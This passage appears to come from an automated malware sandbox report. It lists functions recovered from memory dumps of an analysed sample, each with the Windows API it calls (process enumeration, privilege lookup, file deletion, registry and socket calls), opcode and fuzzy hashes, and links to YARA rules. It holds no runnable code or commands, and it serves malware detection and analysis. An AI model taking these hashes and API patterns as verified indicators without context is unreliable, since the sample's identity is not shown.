              • Opcode Fuzzy Hash: d8504dabb7a7220a1f6b0e723caae01fc2f220487871b5218f64c63e9d05268c
              • Instruction Fuzzy Hash: AF117F72500704AFEB21CE16DC84F66FBE8EF04720F04845AED469B656E664E444DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1148, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 057D11B2
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 21e8ff7c7dad825e886200f3d564c11ae82b16ff3f994d99afb0096fbcb74b22
              • Instruction ID: 7968219897bde7dcce3816b180c72cc4bd48cc700b675cd74ead1b64cf2b7824
              • Opcode Fuzzy Hash: 21e8ff7c7dad825e886200f3d564c11ae82b16ff3f994d99afb0096fbcb74b22
              • Instruction Fuzzy Hash: 2C112E725093809FD721CB65DC85B56FFE8EF05210F0884AAED45CB652D275E844CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2A12, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2A79
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 6f312bc6d3a7d8cb012da4151a872baf8935c5530389c49b9ed9fc03bdbae1df
              • Instruction ID: 0a05a699b69fe97e1200b10c3ccba515902ee8e60bcb4021ea6b8c77a79a5d67
              • Opcode Fuzzy Hash: 6f312bc6d3a7d8cb012da4151a872baf8935c5530389c49b9ed9fc03bdbae1df
              • Instruction Fuzzy Hash: BE11D075500304AFEB31CF55DC84FA6FBA8EF44320F14846AED458B246D238E409CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D25AE, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
              Download Yara Rule
              APIs
              • GetProcessTimes.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D260D
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ProcessTimes
              • String ID:
              • API String ID: 1995159646-0
              • Opcode ID: 48e28af8b98015f6846fd8fc142e0c1227ea2e49f6f8965e4a8216c7cf0a2e0d
              • Instruction ID: 6235259a4a4493d4f7155fddca476c091c7e6e792b6175e03fa650de284ce00d
              • Opcode Fuzzy Hash: 48e28af8b98015f6846fd8fc142e0c1227ea2e49f6f8965e4a8216c7cf0a2e0d
              • Instruction Fuzzy Hash: D611C472500304AFEB21CF65DC85FAAFBA8EF04320F14846AED459B656D675E405CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0E56, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
              Download Yara Rule
              APIs
              • GetExitCodeProcess.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0EAC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CodeExitProcess
              • String ID:
              • API String ID: 3861947596-0
              • Opcode ID: 59353f239af6c5dcac1be8a509bd2e5cc977a441d019408b316d23c3a24fb0ea
              • Instruction ID: 31dea742d91e5479dbc88b3a0d4f20bb201e43004e842ee4eed7ef6aa25de670
              • Opcode Fuzzy Hash: 59353f239af6c5dcac1be8a509bd2e5cc977a441d019408b316d23c3a24fb0ea
              • Instruction Fuzzy Hash: 3811A371500304AFEB21DF29DD85BABFBA8EF04320F14846AED45DB645E674E404CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BA58A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 5b52f069c6cbe38425d60ac5cc89b5bcd4dd63d02d6dd883e1b67b08fdf493f4
              • Instruction ID: ff296711cabd27c47f7b02fc9ccd8bc40a5b8342a551e126cf3ef7527e05d6a1
              • Opcode Fuzzy Hash: 5b52f069c6cbe38425d60ac5cc89b5bcd4dd63d02d6dd883e1b67b08fdf493f4
              • Instruction Fuzzy Hash: 40117F72409380AFDB228F55DC44B62FFF4EF4A220F08849AED858B663D375A518DB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BB7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 014BB841
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 0c237e56b830b7d3993bae8e3be1f82bd1b3710360bb0454a22b0646799d5630
              • Instruction ID: d32f316d3f59698f4b16a37963b7a55bff9265cb0e4da5b0cda2e2a255fc9631
              • Opcode Fuzzy Hash: 0c237e56b830b7d3993bae8e3be1f82bd1b3710360bb0454a22b0646799d5630
              • Instruction Fuzzy Hash: F6218E724097C09FDB238B25DC50A92BFB0EF07214F0D84DAEDC54F263D265A958DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0F32, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileA.KERNELBASE(?,00000E2C), ref: 057D0F9B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: 13b8c46fdb95c72376e452c6beb879ef6ecf0c46de868eb5013c102855f4f9a2
              • Instruction ID: 20b8e6263d6e9e91ae570ad7836554269966c3fc91162abde9728ab82d0c26d3
              • Opcode Fuzzy Hash: 13b8c46fdb95c72376e452c6beb879ef6ecf0c46de868eb5013c102855f4f9a2
              • Instruction Fuzzy Hash: 8211C671600304AFE720DB15DC85FBAFBA8EF04720F28845AED459B685E6B4E545CA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D09F2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
              Download Yara Rule
              APIs
              • setsockopt.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0A51
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: setsockopt
              • String ID:
              • API String ID: 3981526788-0
              • Opcode ID: 3660c0bc92edd57ed90e5f02810aa309fd654e343b8cfbd84534c0efbc87e9c9
              • Instruction ID: dbac43ea1198c863f2c40aa756bbf7d9843cdf797cb7f5bb33045a088181e779
              • Opcode Fuzzy Hash: 3660c0bc92edd57ed90e5f02810aa309fd654e343b8cfbd84534c0efbc87e9c9
              • Instruction Fuzzy Hash: CD119172501304AFEB21CF55DC45FA6FBA8EF44720F14846AED499B656D278E404CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 057D0353
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 51bb84add1fd28628d48e121b57ddad95e58f8ed7b3f62170954ba5aa5011b4e
              • Instruction ID: 076ec16494436a50388dbaffcea6c72cf8166a66b249a1e5efc6bc2c99219828
              • Opcode Fuzzy Hash: 51bb84add1fd28628d48e121b57ddad95e58f8ed7b3f62170954ba5aa5011b4e
              • Instruction Fuzzy Hash: FC11C171500304AFEB31CF15DC85F66FFA8EF04720F14849EED454A696D2B5A548CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 014BBBB9
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 65f7813623d4f1a0021adc29c6970b933c4ab4e12ea0820b99d7888870c92fb4
              • Instruction ID: d3990a448b6108dd1c1aef6569f37d328e1fa6a465dc0e2420e2b3fe96465fee
              • Opcode Fuzzy Hash: 65f7813623d4f1a0021adc29c6970b933c4ab4e12ea0820b99d7888870c92fb4
              • Instruction Fuzzy Hash: 2611B135409380AFD7228F25CC85B52FFB4EF06220F0884DEED858B663D275A458CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
              Download Yara Rule
              APIs
              • DispatchMessageW.USER32(?), ref: 014BBE70
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: e0dc32393c160ad31910be764699bc60bdf13cbf21cacf534ab4657b8dd87238
              • Instruction ID: 872913e518f9674fc060c10c193e457f64b402ac500e9ca84475f59ab4ab612b
              • Opcode Fuzzy Hash: e0dc32393c160ad31910be764699bc60bdf13cbf21cacf534ab4657b8dd87238
              • Instruction Fuzzy Hash: D5113A754093C4AFD7238B259C84B62BFA4DF47624F0984DAED858F263D2756848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BB71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
              Download Yara Rule
              APIs
              • CreateIconFromResourceEx.USER32 ref: 014BB78A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: f9654f101b2a8af659fbc71fb1d634d17579c17e979e84851835745fd9e76ee5
              • Instruction ID: 68e4dc5a1581bdcb4cab37e853dad9351fcb37c1c3f428a32f71b23be42ba662
              • Opcode Fuzzy Hash: f9654f101b2a8af659fbc71fb1d634d17579c17e979e84851835745fd9e76ee5
              • Instruction Fuzzy Hash: 34117272409384AFDB228F55DC84B92FFF4EF49310F09859EED858B562C375A458CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0FDF, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • GetSystemInfo.KERNELBASE(?), ref: 057D1044
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InfoSystem
              • String ID:
              • API String ID: 31276548-0
              • Opcode ID: 585a2c8808f56f4e314dabb3b50a7058396557044400c5579900efd784907717
              • Instruction ID: 7c05a2bb39cf61781fab6e9471649a909c4335b9045280befa2ff29376cd1e01
              • Opcode Fuzzy Hash: 585a2c8808f56f4e314dabb3b50a7058396557044400c5579900efd784907717
              • Instruction Fuzzy Hash: F4116D714093C49FD7128B25DC84B92FFB4EF06224F0984EBED858F163C279A849CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 014BBF0C
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 51100b1c495a964586b7438ac4b19f27604cf9cb118961439f25ac52b87ce7a6
              • Instruction ID: e8abd80e63d6a82d3951fb96df3d857b98808b36c473c03c07f0157c872b0ad9
              • Opcode Fuzzy Hash: 51100b1c495a964586b7438ac4b19f27604cf9cb118961439f25ac52b87ce7a6
              • Instruction Fuzzy Hash: 08118F725053809FD711CF29DC85B96BFE8EF05220F0884AAED45CF262D274E848CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D116A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 057D11B2
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6ff16ade124bf339ca0381d6bacf77d39beae174ed4f354080fb81bb187e07fe
              • Instruction ID: 6a2097aee2caea89e994f05f5be974b45c6000e21d66524ae96cf495a8de8e56
              • Opcode Fuzzy Hash: 6ff16ade124bf339ca0381d6bacf77d39beae174ed4f354080fb81bb187e07fe
              • Instruction Fuzzy Hash: 8A115272A043009FEB60CF69D845B66FBE8EF04320F48C46ADD45CB646E675D444DA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • CreateDirectoryW.KERNELBASE(?,?), ref: 057D079F
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateDirectory
              • String ID:
              • API String ID: 4241100979-0
              • Opcode ID: ab0ec356ce7a67bf86713da2d6ed6f430715f068ece10507a8474bfcc57d7e19
              • Instruction ID: f8702dd1e5293d0a5d4742acfb9f71c47dd34e76d193eee0fa0490883f929d60
              • Opcode Fuzzy Hash: ab0ec356ce7a67bf86713da2d6ed6f430715f068ece10507a8474bfcc57d7e19
              • Instruction Fuzzy Hash: 35115E756042449FDBA0CF6AD888B66FBE8EF04220F0884AADD49CF646E674E444CF71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D0985
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 43427a965aa48ed651fef582957056a05864c1e151e51d0aa9614d15a2fb0fa0
              • Instruction ID: f57e556c95b20daa35cd54986dc6020b1e0fdcab57db7f2e6594bb703e8bee57
              • Opcode Fuzzy Hash: 43427a965aa48ed651fef582957056a05864c1e151e51d0aa9614d15a2fb0fa0
              • Instruction Fuzzy Hash: 2F01D271500304AFE721CF1ADC89FA6FBA8EF44720F54C09AED459B246E278E444CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: closesocket
              • String ID:
              • API String ID: 2781271927-0
              • Opcode ID: c9b25506254b6e42bff9170cf3864a4f7532b20c77b8f287f2f3150ae526a381
              • Instruction ID: b0eace30527d8c8b898ae534bc2152c442acdf9a7c85dc3b2e70ab6eb7e911a6
              • Opcode Fuzzy Hash: c9b25506254b6e42bff9170cf3864a4f7532b20c77b8f287f2f3150ae526a381
              • Instruction Fuzzy Hash: 27119E71449384AFD712CF15DC84B92BFB4EF06224F1884ABED858F253D275A849CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1466, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
              Download Yara Rule
              APIs
              • K32EnumProcesses.KERNEL32(?,?,?,B4FCE2B2,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 057D14A6
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: EnumProcesses
              • String ID:
              • API String ID: 84517404-0
              • Opcode ID: 48f25d39adfbde62af9eb753f01c111faa335f6a42151b4a426985cc2cf941ec
              • Instruction ID: 56ef18570642fb895a908d76bb96389ad2253ba8b5d7e1aef14eb288fe995f9c
              • Opcode Fuzzy Hash: 48f25d39adfbde62af9eb753f01c111faa335f6a42151b4a426985cc2cf941ec
              • Instruction Fuzzy Hash: 1E116D756003449FDB60CF6AD884B66FBE4EF04320F58C4AADD498B656D274E444DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA350, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 014BA3A4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 491d4681805e3faef3d292e5ded10bea19b6c89daaf9e6f4411c0a1e55954b48
              • Instruction ID: 4753eaaa54d8baead502393e6cd9a65a2b70517d290b8226fb79899b740f14b3
              • Opcode Fuzzy Hash: 491d4681805e3faef3d292e5ded10bea19b6c89daaf9e6f4411c0a1e55954b48
              • Instruction Fuzzy Hash: 97116171409384AFD7228B15DC84B62FFA4DF46624F1884DAED858F663D275A818CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA8CC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 014BA926
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: e1784b5169a2f4c31dd391a37b140aeec0bb369c43e17d95b483714574b47bfa
              • Instruction ID: f31290ca159cfc73ebffbcc2026eac6ac90b99f0edc9e4f7fbd7651909dc17e7
              • Opcode Fuzzy Hash: e1784b5169a2f4c31dd391a37b140aeec0bb369c43e17d95b483714574b47bfa
              • Instruction Fuzzy Hash: B7118E35409784AFD7228F15DC85B52FFB4EF06220F09C4DAED854B263C375A859DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0B1A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 057D0B6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileNameTemp
              • String ID:
              • API String ID: 745986568-0
              • Opcode ID: 1bd85563bd9b922ad3ee79178bf9d6d5dd82c1b1e56f9766f1d710c0f733498d
              • Instruction ID: 4559620cfa8b9cdfa79363e44da294381e41124ba2838079614e757e33d4b17e
              • Opcode Fuzzy Hash: 1bd85563bd9b922ad3ee79178bf9d6d5dd82c1b1e56f9766f1d710c0f733498d
              • Instruction Fuzzy Hash: D901B171900600ABD310DF1ADC81B26FBA8FB88B20F14812AED088B641D231B916CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2E1A, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
              Download Yara Rule
              APIs
              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 057D2E6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FormatMessage
              • String ID:
              • API String ID: 1306739567-0
              • Opcode ID: 34d2c5352f1abedbbca5be064fea4663384b43279b27e820798ef77bb8bd274a
              • Instruction ID: 2cba206f8da995cfa2c5d40deebb38c57adf0388b22fab35697fcea2fb11e046
              • Opcode Fuzzy Hash: 34d2c5352f1abedbbca5be064fea4663384b43279b27e820798ef77bb8bd274a
              • Instruction Fuzzy Hash: 7401B171900604ABD310DF1ADC81B26FBA8EB88B20F14812AED088B641D231B916CBE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 014BA1C2
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: 1304aeb48bb6b968f3de494e574b7ddd67fb477e90af5e21137a6f8b92602070
              • Instruction ID: f2cab0d15b2f629101d0b3bd20558d64e596126b402708939b04dcc57d143bd9
              • Opcode Fuzzy Hash: 1304aeb48bb6b968f3de494e574b7ddd67fb477e90af5e21137a6f8b92602070
              • Instruction Fuzzy Hash: 7B01B171900600ABD710DF1ADC81B26FBA8EB88A20F14816AED088B641D231B916CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 014BBF0C
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 997ac8e679204f7342d1745b5b8306f7041c42ba867506ea9ca87c557b16babd
              • Instruction ID: e7fa81acdd3f3297ae40d3ed1d0c759482783e5ace66d65b97d700905521ff32
              • Opcode Fuzzy Hash: 997ac8e679204f7342d1745b5b8306f7041c42ba867506ea9ca87c557b16babd
              • Instruction Fuzzy Hash: C8015E71A003409FEB60CF6AD8857A6FB98EF04220F0884ABDD49CB756D675E444CE72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BB746, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
              Download Yara Rule
              APIs
              • CreateIconFromResourceEx.USER32 ref: 014BB78A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              • Opcode ID: a687a7c462238afa70fe4c1fd5be1a841891a7c91892f1fb2fe15fd4d995e237
              • Instruction ID: 70122d7db2aca1d351ab2db383dad3b89eda61373ecdf22652824c4962389d76
              • Opcode Fuzzy Hash: a687a7c462238afa70fe4c1fd5be1a841891a7c91892f1fb2fe15fd4d995e237
              • Instruction Fuzzy Hash: 66015B324007009FDB218F95D884B96FBA0EF08320F0888AADE854BA26D375E419DF72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BA58A
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: a01e93499bd5c57dc4124f57d8402ad4980f89c55d73419ad6b4d77f12c7dcfa
              • Instruction ID: 52a9e03be0bd0457263e94801635c7d1b776f058fc841ce56436ce1e629c7a1b
              • Opcode Fuzzy Hash: a01e93499bd5c57dc4124f57d8402ad4980f89c55d73419ad6b4d77f12c7dcfa
              • Instruction Fuzzy Hash: C00139325007009FDB218F95D884B56FBE0EF08320F1888AADD894BA66D375A519CF62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1846, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON
              Download Yara Rule
              APIs
              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 057D1896
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Query_
              • String ID:
              • API String ID: 428220571-0
              • Opcode ID: dfac528c8a87afeb3aff2beea8ac2400e250142ea5568d8f14b00af1304d9eef
              • Instruction ID: 33d9bc7f895469a913e94c2a6070995e7d41b4cd4fc403445e511a100e8b31f8
              • Opcode Fuzzy Hash: dfac528c8a87afeb3aff2beea8ac2400e250142ea5568d8f14b00af1304d9eef
              • Instruction Fuzzy Hash: 5F01A271500605ABD214DF1ADC82B26FBA8FB89B20F14811AED084B741D271F516CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0232, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D0264
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 1a0e42a7e7ec6d2ea7ad8871009ab7ecc66fbc2fd700e42f0a9566970e953bc0
              • Instruction ID: 446ddf4b6949fbe630ad8d2979ef2c5abce5501c9649287581eda9d078438f7f
              • Opcode Fuzzy Hash: 1a0e42a7e7ec6d2ea7ad8871009ab7ecc66fbc2fd700e42f0a9566970e953bc0
              • Instruction Fuzzy Hash: 5201D4719013009FDB50CF19D888B65FBA4EF40320F08C4ABDC458F646E274F444DA71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D13BA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D13EC
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 72997fd3ae9e934ac6057c0e6ef370f547f86f97d55e4a735a87d7b6d205753d
              • Instruction ID: 3d8f2b57ff92c0fb9ee00035bf499d94ac65f3712b1081ef8e9816f805f722f3
              • Opcode Fuzzy Hash: 72997fd3ae9e934ac6057c0e6ef370f547f86f97d55e4a735a87d7b6d205753d
              • Instruction Fuzzy Hash: AD018F75A043408FDB60CF5AE984B66FBA4EF04321F08C4AADD498FA46D274E458CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 014BAFEA
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 0b809585666da7c50f3a7b7f1e40ac733b96eec59ee8d652efd32b34340638b0
              • Instruction ID: c68daf4ed38cbbeb2dffaca06a531f961f3938014476b57316207a3eb606da41
              • Opcode Fuzzy Hash: 0b809585666da7c50f3a7b7f1e40ac733b96eec59ee8d652efd32b34340638b0
              • Instruction Fuzzy Hash: D701A271500605ABD214DF1ADC82B26FBA8FB89B20F14815AED084B741D271F516CBE5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 014BBBB9
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 9cca9a286c351f15d46c4a0a6ae63c91bc9d17cb217a200daa0dd52165fb4b79
              • Instruction ID: ec881cbc3f7e8349afe829e2d62e3d3449252ea0d5a5772d0faff65607d503f0
              • Opcode Fuzzy Hash: 9cca9a286c351f15d46c4a0a6ae63c91bc9d17cb217a200daa0dd52165fb4b79
              • Instruction Fuzzy Hash: DA015E365047409FDB318F5AD885BA6FBA4EF04320F08C49ADD464BA66D275E458CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA78A, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: closesocket
              • String ID:
              • API String ID: 2781271927-0
              • Opcode ID: 98e3d036dcdc03250bcfecc8c7b822304045f5f255a609b97373b4c989a01c18
              • Instruction ID: ef3370e3dc13b2216eb68b0dbdf4f15d45cf53cdc4b9c403b619c6584edc50f8
